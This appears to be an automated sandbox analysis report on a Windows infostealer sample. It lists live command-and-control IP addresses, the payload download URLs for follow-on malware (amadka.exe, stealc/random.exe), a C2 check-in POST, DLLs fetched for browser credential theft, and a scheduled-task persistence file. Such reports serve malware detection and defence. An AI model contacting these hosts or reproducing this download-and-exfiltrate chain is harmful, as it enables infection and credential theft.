Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: unknown TCP traffic detected without corresponding DNS query: 85.28.47.4
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Code function: 13_2_004ABD30 InternetOpenW,InternetConnectA,HttpSendRequestA,InternetReadFile, 13_2_004ABD30
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/sqlite3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/freebl3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/mozglue.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/msvcp140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/nss3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/softokn3.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /69934896f997d5bb/vcruntime140.dll HTTP/1.1Host: 85.28.47.4Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /mine/amadka.exe HTTP/1.1Host: 77.91.77.81Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 77.91.77.81
Source: unknown HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHDAAKJEGCFCAKEBKJJEHost: 85.28.47.4Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 36 30 43 39 36 36 38 33 39 32 37 32 30 32 39 37 34 31 31 31 39 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 47 48 44 41 41 4b 4a 45 47 43 46 43 41 4b 45 42 4b 4a 4a 45 2d 2d 0d 0a Data Ascii: ------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="hwid"660C966839272029741119------GHDAAKJEGCFCAKEBKJJEContent-Disposition: form-data; name="build"default------GHDAAKJEGCFCAKEBKJJE--
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000D26000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exe
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000D26000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exe00
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/cost/go.exepData
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000D26000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000D26000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exe00
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000D26000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exephprefoxox
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000D26000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: http://77.91.77.81/mine/amadka.exera
Source: explorti.exe, 0000000D.00000002.3230163969.0000000001252000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exe
Source: explorti.exe, 0000000D.00000002.3230163969.0000000001252000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exe50673
Source: explorti.exe, 0000000D.00000002.3230163969.0000000001252000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exe50673b5d7
Source: explorti.exe, 0000000D.00000002.3230163969.0000000001252000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.81/stealc/random.exeH
Source: explorti.exe, 0000000D.00000002.3230163969.000000000126A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/
Source: explorti.exe, 0000000D.00000002.3230163969.000000000120F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php
Source: explorti.exe, 0000000D.00000002.3230163969.0000000001252000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php%
Source: explorti.exe, 0000000D.00000002.3230163969.000000000126A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php)
Source: explorti.exe, 0000000D.00000002.3230163969.000000000126A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php-
Source: explorti.exe, 0000000D.00000002.3230163969.000000000126A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php/Hun4Ko/index.php
Source: explorti.exe, 0000000D.00000002.3230163969.000000000126A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php0
Source: explorti.exe, 0000000D.00000002.3230163969.000000000126A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.php5
Source: explorti.exe, 0000000D.00000002.3230163969.000000000126A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpI
Source: explorti.exe, 0000000D.00000002.3230163969.000000000126A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpU
Source: explorti.exe, 0000000D.00000002.3230163969.000000000126A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpk
Source: explorti.exe, 0000000D.00000002.3230163969.0000000001252000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phplF~n
Source: explorti.exe, 0000000D.00000002.3230163969.000000000126A000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpn
Source: explorti.exe, 0000000D.00000002.3230163969.0000000001252000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://77.91.77.82/Hun4Ko/index.phpsa3b2c9311b.exe
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000001FEE000.00000004.00000020.00020000.00000000.sdmp, a3b2c9311b.exe, 0000000E.00000002.2770510086.00000000012DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4
Source: a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000132E000.00000004.00000020.00020000.00000000.sdmp, a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000131B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/
Source: a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000132E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/20475a59bac849d.php
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/freebl3.dll
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/freebl3.dlly
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/mozglue.dll
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/mozglue.dlll
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/msvcp140.dll
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/nss3.dll
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/nss3.dllT
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/softokn3.dll
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/softokn3.dll$
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/sqlite3.dll
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/sqlite3.dllc
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/69934896f997d5bb/vcruntime140.dll
Source: a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000131B000.00000004.00000020.00020000.00000000.sdmp, a3b2c9311b.exe, 0000000E.00000002.2770510086.00000000012DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.php
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.000000000203D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.php)
Source: a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000132E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.php1
Source: a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000132E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.php:9y
Source: a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000132E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.phpC9B
Source: a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000131B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.phpFl
Source: a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000132E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/920475a59bac849d.phpi94
Source: a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000132E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/a81-46d0-b6b6-535557bcc5fapN9U
Source: a3b2c9311b.exe, 0000000E.00000002.2770510086.000000000131B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4/pl
Source: a3b2c9311b.exe, 0000000E.00000002.2770510086.00000000012DE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://85.28.47.4;
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: ukuWaeRgPR.exe, random[1].exe.13.dr, a3b2c9311b.exe.13.dr String found in binary or memory: http://pki-crl.symauth.com/ca_732b6ec148d290c0a071efd1dac8e288/LatestCRL.crl07
Source: ukuWaeRgPR.exe, random[1].exe.13.dr, a3b2c9311b.exe.13.dr String found in binary or memory: http://pki-crl.symauth.com/offlineca/TheInstituteofElectricalandElectronicsEngineersIncIEEERootCA.cr
Source: ukuWaeRgPR.exe, random[1].exe.13.dr, a3b2c9311b.exe.13.dr String found in binary or memory: http://pki-ocsp.symauth.com0
Source: Amcache.hve.4.dr String found in binary or memory: http://upx.sf.net
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: ukuWaeRgPR.exe, ukuWaeRgPR.exe, 00000000.00000002.2210447818.000000006C38D000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: ukuWaeRgPR.exe, 00000000.00000002.2210120301.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, ukuWaeRgPR.exe, 00000000.00000002.2188735345.000000001D724000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000002056000.00000004.00000020.00020000.00000000.sdmp, GCGDGHCB.0.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000002142000.00000004.00000020.00020000.00000000.sdmp, BAFIEGIECGCBKFIEBGCA.0.dr String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000002142000.00000004.00000020.00020000.00000000.sdmp, BAFIEGIECGCBKFIEBGCA.0.dr String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
Source: GCGDGHCB.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000002056000.00000004.00000020.00020000.00000000.sdmp, GCGDGHCB.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000002056000.00000004.00000020.00020000.00000000.sdmp, GCGDGHCB.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000002142000.00000004.00000020.00020000.00000000.sdmp, BAFIEGIECGCBKFIEBGCA.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000002142000.00000004.00000020.00020000.00000000.sdmp, BAFIEGIECGCBKFIEBGCA.0.dr String found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
Source: GCGDGHCB.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: GCGDGHCB.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: GCGDGHCB.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: BAFIEGIECGCBKFIEBGCA.0.dr String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://mozilla.org0/
Source: AAAKEBGDAFHIIDHIIECFBKFIJK.0.dr String found in binary or memory: https://support.mozilla.org
Source: AAAKEBGDAFHIIDHIIECFBKFIJK.0.dr String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: AAAKEBGDAFHIIDHIIECFBKFIJK.0.dr String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBL
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000002142000.00000004.00000020.00020000.00000000.sdmp, BAFIEGIECGCBKFIEBGCA.0.dr String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_35787f1071928bc3a1aef90b79c9bee9c64ba6683fde7477
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000002142000.00000004.00000020.00020000.00000000.sdmp, BAFIEGIECGCBKFIEBGCA.0.dr String found in binary or memory: https://www.bestbuy.com/site/electronics/top-deals/pcmcat1563299784494.c/?id=pcmcat1563299784494&ref
Source: freebl3[1].dll.0.dr, softokn3[1].dll.0.dr, nss3.dll.0.dr, freebl3.dll.0.dr, nss3[1].dll.0.dr, mozglue[1].dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: ukuWaeRgPR.exe, 00000000.00000002.2171110129.0000000002056000.00000004.00000020.00020000.00000000.sdmp, GCGDGHCB.0.dr String found in binary or memory: https://www.ecosia.org/newtab/
Source: GCGDGHCB.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: AAAKEBGDAFHIIDHIIECFBKFIJK.0.dr String found in binary or memory: https://www.mozilla.org
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000D26000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: AAAKEBGDAFHIIDHIIECFBKFIJK.0.dr String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000D26000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/about/t.exe
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000D26000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: AAAKEBGDAFHIIDHIIECFBKFIJK.0.dr String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000D26000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/contribute/vchost.exe
Source: ukuWaeRgPR.exe, 00000000.00000003.2107422845.000000002F9FC000.00000004.00000020.00020000.00000000.sdmp, AAAKEBGDAFHIIDHIIECFBKFIJK.0.dr String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: AAAKEBGDAFHIIDHIIECFBKFIJK.0.dr String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: ukuWaeRgPR.exe, 00000000.00000003.2107422845.000000002F9FC000.00000004.00000020.00020000.00000000.sdmp, AAAKEBGDAFHIIDHIIECFBKFIJK.0.dr String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/
Source: ukuWaeRgPR.exe, 00000000.00000003.2107422845.000000002F9FC000.00000004.00000020.00020000.00000000.sdmp, AAAKEBGDAFHIIDHIIECFBKFIJK.0.dr String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: ukuWaeRgPR.exe, 00000000.00000002.2169837942.0000000000DCA000.00000040.00000001.01000000.00000003.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/host.exe

System Summary
barindex
PE file contains section with special chars
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: amadka[1].exe.0.dr Static PE information: section name: .idata
Source: amadka[1].exe.0.dr Static PE information: section name:
Source: EHDHDHIECG.exe.0.dr Static PE information: section name:
Source: EHDHDHIECG.exe.0.dr Static PE information: section name: .idata
Source: EHDHDHIECG.exe.0.dr Static PE information: section name:
Source: explorti.exe.6.dr Static PE information: section name:
Source: explorti.exe.6.dr Static PE information: section name: .idata
Source: explorti.exe.6.dr Static PE information: section name:
PE file has nameless sections
Source: ukuWaeRgPR.exe Static PE information: section name:
Source: ukuWaeRgPR.exe Static PE information: section name:
Source: ukuWaeRgPR.exe Static PE information: section name:
Source: ukuWaeRgPR.exe Static PE information: section name:
Source: ukuWaeRgPR.exe Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: random[1].exe.13.dr Static PE information: section name:
Source: a3b2c9311b.exe.13.dr Static PE information: section name:
Source: a3b2c9311b.exe.13.dr Static PE information: section name:
Source: a3b2c9311b.exe.13.dr Static PE information: section name:
Source: a3b2c9311b.exe.13.dr Static PE information: section name:
Source: a3b2c9311b.exe.13.dr Static PE information: section name:
Contains functionality to call native functions
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C37B700 NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C37B700
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C37B8C0 rand_s,NtQueryVirtualMemory, 0_2_6C37B8C0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C37B910 rand_s,NtQueryVirtualMemory,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error,GetLastError, 0_2_6C37B910
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C31F280 NtQueryVirtualMemory,GetProcAddress,NtQueryVirtualMemory,RtlNtStatusToDosError,RtlSetLastWin32Error, 0_2_6C31F280
Creates files inside the system directory
Source: C:\Users\user\AppData\Local\Temp\EHDHDHIECG.exe File created: C:\Windows\Tasks\explorti.job Jump to behavior
Detected potential crypto function
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C3135A0 0_2_6C3135A0
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C38542B 0_2_6C38542B
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C355C10 0_2_6C355C10
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C362C10 0_2_6C362C10
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C38AC00 0_2_6C38AC00
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C38545C 0_2_6C38545C
Source: C:\Users\user\Desktop\ukuWaeRgPR.exe Code function: 0_2_6C325440 0_2_6C325440
